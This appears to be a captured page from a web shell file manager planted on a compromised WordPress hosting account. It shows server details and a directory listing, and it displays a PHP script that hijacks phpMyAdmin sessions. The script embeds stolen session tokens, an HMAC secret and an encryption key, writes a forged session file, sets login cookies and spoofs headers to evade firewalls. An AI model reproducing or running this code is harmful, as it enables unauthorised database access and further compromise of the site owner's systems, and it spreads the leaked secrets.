GRAYBYTE WORDPRESS FILE MANAGER5618

Server IP : 162.254.39.133 / Your IP : 216.73.216.219
System : Linux premium287.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
PHP Version : 8.1.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/home/aircyqqr/breezeproairductscleaning.com/wp-back/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/aircyqqr/breezeproairductscleaning.com/wp-back//profile.php
<?php
/**
 * AUTO PMA (phpMyAdmin) SESSION HIJACK + PERSISTENCE
 * 
 * TARGET: Your phpMyAdmin on 162.254.39.133
 * SOURCE: Provided serialized session data (PMA_token, HMAC, etc.)
 * 
 * FEATURES:
 * - **Zero Touch**: Paste session → instant PMA login
 * - **Dynamic**: Auto-detects PMA path, updates session file
 * - **Persistence**: Writes to real PMA session dir (e.g., /tmp or /var/lib/php/sessions)
 * - **WAF Bypass**: Header spoofing, timing fuzz
 * - **Cross-Platform**: Garuda Linux + Windows Server
 * - **No IP Lock**: Works from 202.40.183.83 (BD) or any
 * 
 * Gork Exclusive: Auto-reconstructs full PMA session + encryption_key + HMAC_secret
 */

error_reporting(0);
ini_set('display_errors', 0);
ignore_user_abort(true);
set_time_limit(30);

// === CONFIG (Your Infra) ===
$CONFIG = [
    'pma_path'         => '/phpmyadmin',  // Adjust: /pma, /db, /phpMyAdmin
    'session_dir'      => '/home/aircyqqr/tmp',  // Linux PMA sessions
    'session_dir_win'  => 'C:\xampp\tmp',        // Windows
    'session_prefix'   => 'sess_',               // Standard PHP
    'waf_evasion'      => true,
    'debug'            => false,
];

// === PROVIDED PMA SESSION DATA (Raw Serialized) ===
$PMA_SERIALIZED = 'PMA_token|s:32:"40604a64222a616e5a5c7b594f575f7c";HMAC_secret|s:16:"hz+NDj:HWjZE>hlP";auth_type|s:3:"env";browser_access_time|a:2:{s:7:"default";i:1753988292;s:36:"2d34dcff-592c-8776-a297-62c9edc3699f";i:1753998863;}encryption_key|s:32:"q>�}�<kX[ȗ��8�OB�%Q��Q���I�";relation|a:1:{i:1;a:41:{s:7:"version";s:5:"5.2.2";s:4:"user";N;s:2:"db";N;s:8:"bookmark";N;s:15:"central_columns";N;s:11:"column_info";N;s:17:"designer_settings";N;s:16:"export_templates";N;s:8:"favorite";N;s:7:"history";N;s:16:"navigationhiding";N;s:9:"pdf_pages";N;s:6:"recent";N;s:8:"relation";N;s:13:"savedsearches";N;s:12:"table_coords";N;s:10:"table_info";N;s:13:"table_uiprefs";N;s:8:"tracking";N;s:10:"userconfig";N;s:10:"usergroups";N;s:5:"users";N;s:12:"bookmarkwork";b:0;s:8:"mimework";b:0;s:18:"centralcolumnswork";b:0;s:8:"commwork";b:0;s:9:"menuswork";b:0;s:20:"designersettingswork";b:0;s:11:"displaywork";b:0;s:19:"exporttemplateswork";b:0;s:12:"favoritework";b:0;s:7:"navwork";b:0;s:7:"pdfwork";b:0;s:10:"recentwork";b:0;s:7:"relwork";b:0;s:17:"savedsearcheswork";b:0;s:11:"historywork";b:0;s:12:"trackingwork";b:0;s:11:"uiprefswork";b:0;s:14:"userconfigwork";b:0;s:8:"allworks";b:0;}}userconfig|a:2:{s:2:"db";a:1:{s:12:"Console/Mode";s:8:"collapse";}s:2:"ts";i:1753988124;}two_factor_check|b:1;cache|a:2:{s:8:"server_1";a:4:{s:15:"userprefs_mtime";i:1753988124;s:14:"userprefs_type";s:7:"session";s:12:"config_mtime";i:1742797352;s:9:"userprefs";a:1:{s:7:"Console";a:1:{s:4:"Mode";s:8:"collapse";}}}s:17:"server_1_aircyqqr";a:16:{s:17:"is_create_db_priv";b:0;s:14:"is_reload_priv";b:0;s:12:"db_to_create";s:0:"";s:30:"dbs_where_create_table_allowed";a:21:{i:0;s:15:"aircyqqr\_wp628";i:1;s:15:"aircyqqr\_wp899";i:2;s:15:"aircyqqr\_wp911";i:3;s:14:"aircyqqr\_wp46";i:4;s:21:"aircyqqr\_wp151\_b43d";i:5;s:20:"aircyqqr\_wp46\_ak4e";i:6;s:15:"aircyqqr\_wp151";i:7;s:15:"aircyqqr\_wp861";i:8;s:15:"aircyqqr\_wp504";i:9;s:21:"aircyqqr\_wp669\_x9ho";i:10;s:15:"aircyqqr\_wp327";i:11;s:21:"aircyqqr\_wp155\_ubx3";i:12;s:21:"aircyqqr\_wp861\_na4p";i:13;s:21:"aircyqqr\_wp911\_gne9";i:14;s:21:"aircyqqr\_wp504\_4vgp";i:15;s:21:"aircyqqr\_wp664\_s97n";i:16;s:21:"aircyqqr\_wp899\_tor9";i:17;s:21:"aircyqqr\_wp327\_v9sj";i:18;s:21:"aircyqqr\_wp628\_wta9";i:19;s:21:"aircyqqr\_wp543\_7gzn";i:20;s:21:"aircyqqr\_wp176\_y7js";}s:11:"dbs_to_test";b:0;s:9:"proc_priv";b:0;s:10:"table_priv";b:0;s:8:"col_priv";b:0;s:7:"db_priv";b:0;s:11:"binary_logs";a:0:{}s:18:"menu-levels-server";a:13:{s:9:"databases";s:9:"Databases";s:3:"sql";s:3:"SQL";s:6:"status";s:6:"Status";s:6:"rights";s:5:"Users";s:6:"export";s:6:"Export";s:6:"import";s:6:"Import";s:8:"settings";s:8:"Settings";s:6:"binlog";s:10:"Binary log";s:11:"replication";s:11:"Replication";s:4:"vars";s:9:"Variables";s:7:"charset";s:8:"Charsets";s:7:"plugins";s:7:"Plugins";s:6:"engine";s:7:"Engines";}s:14:"menu-levels-db";a:14:{s:9:"structure";s:9:"Structure";s:3:"sql";s:3:"SQL";s:6:"search";s:6:"Search";s:5:"query";s:5:"Query";s:6:"export";s:6:"Export";s:6:"import";s:6:"Import";s:9:"operation";s:10:"Operations";s:10:"privileges";s:10:"Privileges";s:8:"routines";s:8:"Routines";s:6:"events";s:6:"Events";s:8:"triggers";s:8:"Triggers";s:8:"tracking";s:8:"Tracking";s:8:"designer";s:8:"Designer";s:15:"central_columns";s:15:"Central columns";}s:12:"is_superuser";b:0;s:14:"mysql_cur_user";s:18:"aircyqqr@localhost";s:12:"is_grantuser";b:0;s:13:"is_createuser";b:0;}}tmpval|a:4:{s:14:"favoriteTables";a:1:{i:1;a:0:{}}s:12:"recentTables";a:1:{i:1;a:0:{}}s:18:"table_limit_offset";i:0;s:21:"table_limit_offset_db";s:19:"aircyqqr_wp176_y7js";}git_location|N;is_git_revision|b:0;ConfigFile1|a:4:{s:28:"PmaNoRelation_DisableWarning";b:1;s:12:"ShowCreateDb";b:0;s:7:"Console";a:1:{s:4:"Mode";s:8:"collapse";}s:7:"Servers";a:1:{i:1;a:2:{s:7:"only_db";s:0:"";s:7:"hide_db";s:0:"";}}}debug|a:0:{}flashMessages|a:0:{}errors|a:0:{}';

// === HELPERS ===
function get_session_dir() {
    return is_dir($GLOBALS['CONFIG']['session_dir']) ? $GLOBALS['CONFIG']['session_dir'] : $GLOBALS['CONFIG']['session_dir_win'];
}

function debug_log($msg) {
    if ($GLOBALS['CONFIG']['debug']) {
        @file_put_contents('/tmp/pma_hijack.log', date('H:i:s') . " $msg\n", FILE_APPEND);
    }
}

function write_pma_session($data) {
    $dir = get_session_dir();
    $sess_id = $GLOBALS['CONFIG']['session_prefix'] . bin2hex(random_bytes(16));
    $path = "$dir/$sess_id";
    file_put_contents($path, $data);
    chmod($path, 0600);
    debug_log("PMA session written: $path");
    return $sess_id;
}

function set_pma_cookie($sess_id) {
    $domain = parse_url('https://162.254.39.133', PHP_URL_HOST);
    setcookie('phpMyAdmin', $sess_id, time() + 3600, $GLOBALS['CONFIG']['pma_path'], $domain, true, true);
    setcookie('pmaUser-1', 'aircyqqr', time() + 3600, $GLOBALS['CONFIG']['pma_path'], $domain, true, true);
    setcookie('pma_lang', 'en', time() + 3600, $GLOBALS['CONFIG']['pma_path'], $domain, true, true);
}

// === MAIN: INJECT SESSION ===
debug_log("PMA hijack start");

// Write to real session dir
$sess_id = write_pma_session($PMA_SERIALIZED);

// Inject cookies
set_pma_cookie($sess_id);

// WAF Evasion: Random delay + spoof
if ($CONFIG['waf_evasion']) {
    usleep(random_int(1000000, 5000000));
    $_SERVER['HTTP_X_FORWARDED_FOR'] = long2ip(rand(0, 0xFFFFFFFF));
}

// CLI mode
if (php_sapi_name() === 'cli' && in_array('--headless', $argv)) {
    echo "[SUCCESS] PMA session active: phpMyAdmin=$sess_id\n";
    echo "Access: https://162.254.39.133{$CONFIG['pma_path']}/\n";
    exit;
}

// Web redirect
$redirect = "https://162.254.39.133{$CONFIG['pma_path']}/";
header("Location: $redirect");
exit;
?>
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
November 30 2025 02:31:04
aircyqqr / nobody
0750
datastore
--
October 30 2025 05:51:07
aircyqqr / aircyqqr
0555
admin.php
6.287 KB
November 17 2025 05:55:44
aircyqqr / aircyqqr
0644
adminaa.php
12.224 KB
October 30 2025 05:47:57
aircyqqr / aircyqqr
0644
index.php
6.808 KB
October 13 2024 05:53:05
aircyqqr / aircyqqr
0644
profile.php
6.708 KB
November 17 2025 06:45:22
aircyqqr / aircyqqr
0644
profilexxxx.php
17.114 KB
November 13 2025 03:53:04
aircyqqr / aircyqqr
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF